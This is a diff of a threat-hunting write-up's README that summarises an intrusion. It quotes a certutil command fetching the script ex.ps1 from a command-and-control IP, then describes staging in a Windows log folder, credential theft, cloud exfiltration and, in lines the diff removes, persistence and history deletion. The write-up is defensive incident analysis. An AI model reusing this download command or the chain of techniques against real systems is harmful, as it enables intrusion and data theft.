behan101/Threat-Hunt-Cargo-Hold/README.md

 The PowerShell script `ex.ps1` was downloaded at using the command `"certutil.exe" -urlcache -f http://78.141.196.6:7331/ex.ps1` which also established the first contact of the C2 server `78.141.196.6`.<br>

 From the logs, the PowerShell script `ex.ps1` was downloaded into the staging directory `C:\Windows\Logs\CBS\` through the IP address `78.141.196.6`.
-The script then triggered events that collected credentials, prepared the data for exfiltration, and exfiltrated the stolen data through a cloud service.
-Evidence of persistence was found in the form of an obfuscated PowerShell file `svchost.ps1`.
-Anti-forensic attempts were apparent by the deletion of the PowerShell history file `ConsoleHost_history.txt`.<br>
+The script then triggered events that collected credentials, prepared the data for exfiltration, and exfiltrated the stolen data through a cloud service.<br>

 <img width="1409" height="524" alt="image" src="https://github.com/user-attachments/assets/b59ab898-9cb3-4387-a55d-48f06d0fafed" />